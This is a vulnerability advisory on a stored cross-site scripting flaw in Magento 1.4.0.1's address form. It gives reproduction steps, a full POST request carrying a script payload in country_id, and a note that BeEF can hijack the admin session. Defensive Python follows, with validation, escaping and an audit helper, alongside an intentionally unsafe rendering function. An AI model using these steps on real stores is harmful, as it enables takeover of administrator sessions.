Magento E-commerce Persistent Cross Site Scripting Issue

7Safe's pentest team found a persistent cross-site scripting issue in the Magento e-commerce application. Magento has released a new version which addresses this issue. The issue was reported in version 1.4.0.1; it is quite likely that earlier versions are vulnerable too. 7Safe has rated this issue as high/critical and advises all Magento customers to upgrade to the new version.

Risk Rating: High/Critical

Technical Details:

The admin section is vulnerable to persistent cross-site scripting: any registered user (standard, non-admin) can carry out this attack against an admin user and hijack their session. The issue can be reproduced with these steps:

1. Log in, or create a new account via the registration functionality.

2. Add or edit the primary address.

3. Use an intercepting proxy such as Burp Proxy to manipulate the resulting POST request. Modify the country_id parameter to include JavaScript. The request would look like this:

POST /customer/address/formPost/id/xxxx/?chpage=1 HTTP/1.1
Host: www.xxxxxxxxxx
User-Agent: Mozilla/5.0 xxxxxxxxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.xxxxxxxxxxx/customer/address/edit/id/53625
Cookie: frontend=xxxxxxxxxxx; currency=EUR; PHPSESSID=xxxxxxxxxxxxxxxxxxxxxx; __utmb=123697033.7.10.1285169224
Content-Type: application/x-www-form-urlencoded
Content-Length: 551

form_key=31LBvAjNzFb0HJSa&fax=Billing+Address&success_url=&error_url=&firstname=aaaa7safe&lastname=aaaa&telephone=11111+script+&company=7safe&street%5B%5D=7safe&city=7safe&region=7safe&postcode=7safe&country_id=<script>alert(1);</script>

4. Following this, when an admin user logs into the admin panel the script is executed automatically as soon as they navigate to the 'Customers' tab. If there are many customers in the system and the 'Customers' tab only shows the most recent few, the admin user may have to navigate to the page that lists the malicious user before the script executes. A newly created user is usually displayed on the first page of this tab, so carrying out the attack with a newly registered account only requires the admin user to click on the 'Customers' tab.

5. The script now runs with the admin user's session, which can be hijacked; a browser hooking framework such as BeEF makes this straightforward.
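The steps above come down to two missing controls: the address form accepts any text as country_id instead of a known country code, and the admin 'Customers' grid writes the stored value into its markup without HTML-encoding it. The following is an added example written for this page, not Magento's own code; it parses a constructed copy of the POST body shown above, applies the server-side allow-list check, contrasts the unsafe grid rendering with an encoded one, and includes a small audit helper for finding addresses that were already stored with a bogus country_id. The function names, the short country allow-list and the sample rows are all assumptions of this example.

```python
"""Illustrative handling of the Magento address form discussed above.

Added example, not Magento source. Shows (a) rejecting a country_id that is
not a known code, (b) encoding stored values before they reach the admin grid,
and (c) auditing rows that were stored before the fix.
"""
from __future__ import annotations

from html import escape
from urllib.parse import parse_qs

# Allow-list of ISO 3166-1 alpha-2 codes. A real deployment would load the
# full country table; this short set is constructed for the example.
KNOWN_COUNTRY_IDS = {"GB", "US", "DE", "FR", "NL", "IE"}

# Constructed copy of the POST body from the advisory above.
MALICIOUS_BODY = (
    "form_key=31LBvAjNzFb0HJSa&fax=Billing+Address&success_url=&error_url="
    "&firstname=aaaa7safe&lastname=aaaa&telephone=11111+script+&company=7safe"
    "&street%5B%5D=7safe&city=7safe&region=7safe&postcode=7safe"
    "&country_id=<script>alert(1);</script>"
)

GRID_COLUMNS = ("firstname", "lastname", "city", "country_id")


def parse_address_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into a dict.

    Scalar fields keep their first value; Magento's street[] array is kept
    as a list. Blank values are preserved so the caller sees every field."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: (v if k.endswith("[]") else v[0]) for k, v in fields.items()}


def validate_address(form: dict) -> tuple[bool, str]:
    """Server-side check the advisory shows to be missing: country_id must be
    one of the known codes, otherwise the submission is rejected outright."""
    country = form.get("country_id", "")
    if country not in KNOWN_COUNTRY_IDS:
        return False, f"unknown country_id: {country!r}"
    return True, "ok"


def render_customer_row_unsafe(customer: dict) -> str:
    """The vulnerable pattern: stored data concatenated straight into HTML,
    so a stored <script> becomes live script in the admin's browser."""
    cells = "".join(f"<td>{customer.get(k, '')}</td>" for k in GRID_COLUMNS)
    return f"<tr>{cells}</tr>"


def render_customer_row(customer: dict) -> str:
    """Hardened rendering: every value is HTML-escaped (including quotes) before
    it is placed into markup, so even a value that bypassed validation is inert."""
    cells = "".join(
        f"<td>{escape(str(customer.get(k, '')), quote=True)}</td>"
        for k in GRID_COLUMNS
    )
    return f"<tr>{cells}</tr>"


def contains_script_tag(html: str) -> bool:
    """Crude check used only to demonstrate the difference between renderings."""
    return "<script" in html.lower()


def find_suspect_rows(rows: list[dict]) -> list[int]:
    """Audit helper for a deployment that ran a vulnerable version: return the
    entity ids of stored addresses whose country_id is not a known code.
    The rows stand in for a query against the customer address table."""
    return [r["entity_id"] for r in rows if r.get("country_id") not in KNOWN_COUNTRY_IDS]


def demo() -> dict:
    """Run the whole flow on the constructed body and return the findings."""
    form = parse_address_form(MALICIOUS_BODY)
    accepted, reason = validate_address(form)
    return {
        "accepted": accepted,
        "reason": reason,
        "unsafe_row_has_script": contains_script_tag(render_customer_row_unsafe(form)),
        "safe_row_has_script": contains_script_tag(render_customer_row(form)),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
    # Constructed rows: one legitimate address and one stored by the attack.
    sample_rows = [
        {"entity_id": 101, "country_id": "GB"},
        {"entity_id": 102, "country_id": "<script>alert(1);</script>"},
    ]
    print("suspect address ids:", find_suspect_rows(sample_rows))
```

Both controls are needed: the allow-list stops the payload being stored in the first place, while output encoding in the grid protects against values that arrived by another path (an import, an API call, or a row stored before the upgrade). The audit helper is the check to run once the patched version is installed, since upgrading alone does not remove anything already sitting in the database.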
